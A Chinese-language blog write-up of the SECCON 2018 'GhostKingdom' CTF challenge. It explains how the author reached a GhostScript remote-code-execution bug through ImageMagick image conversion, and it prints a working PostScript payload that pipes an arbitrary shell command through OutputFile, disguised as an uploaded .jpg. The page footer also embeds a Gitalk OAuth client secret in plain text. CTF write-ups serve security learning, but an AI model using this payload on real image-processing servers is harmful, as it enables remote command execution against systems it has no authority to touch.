<p>通过cookie的名字”CGISESSID”可以知道后端是perl，而perl处理图片用的是”ImageMagick”，最开始以后是ImageMagick的RCE，但是一直没有成功，后来才想起来题目是”GhostKingdom”，而在ImageMagick中做图片的转换时使用了ghostscript，而GhostScript也存在一个RCE漏洞，但是这个洞并没有CVE的编号所以才将注意力转移到ghostscript</p>
<p>关于GhostScript的漏洞分析请参考<a href="https://www.anquanke.com/post/id/157380" target="_blank" rel="noopener">https://www.anquanke.com/post/id/157380</a></p>
<p>payload如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">%!PS</span><br><span class="line"></span><br><span class="line">userdict &#x2F;setpagedevice undef</span><br><span class="line">legal</span><br><span class="line">&#123; null restore &#125; stopped &#123; pop &#125; if</span><br><span class="line">legal</span><br><span class="line">mark &#x2F;OutputFile (%pipe%id) currentdevice putdeviceprops</span><br></pre></td></tr></table></figure>
<p>将上面的payload保存到一个jpg文件中，第7行的id可以换成任何想执行的命令，上传以后再转换为gif，触发漏洞，拿到flag的文件名<br><img src="/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027225501.png" alt><br><img src="/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027225514.png" alt></p>
<p>最后拿到flag<br><img src="/2018/10/28/Seccon2018-GhostKingdom-Writeup/TIM%E6%88%AA%E5%9B%BE20181027234138.png" alt></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/writeup/" rel="tag"># writeup</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2018/10/27/Hitcon-2018-BabyCake-Writeup/" rel="prev" title="Hitcon 2018 BabyCake Writeup">
      <i class="fa fa-chevron-left"></i> Hitcon 2018 BabyCake Writeup
    </a></div>
      <div class="post-nav-item">
    <a href="/2018/11/12/HCTF2018-Bottle-Writeup/" rel="next" title="HCTF2018 Bottle Writeup">
      HCTF2018 Bottle Writeup <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#GhostKindom"><span class="nav-number">1.</span> <span class="nav-text">GhostKindom</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Srpopty</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Srpopty" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Srpopty" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:srpopty@outlook.com" title="E-Mail → mailto:srpopty@outlook.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 2016 – 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Srpopty</span>
</div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='255,255,255' opacity='1' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : 'fb9b672afa74e328fbe8',
      clientSecret: '7b3efe103d7e694008b943a67e5273ad36ee14a0',
      repo        : 'srpopty.github.io',
      owner       : 'Srpopty',
      admin       : ['Srpopty'],
      id          : '0659a5c2a1532a443d808ceb018ff141',
        language: 'en',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
